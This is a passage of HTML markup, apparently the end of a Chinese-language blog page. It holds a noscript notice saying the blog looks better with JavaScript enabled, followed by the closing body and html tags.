    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
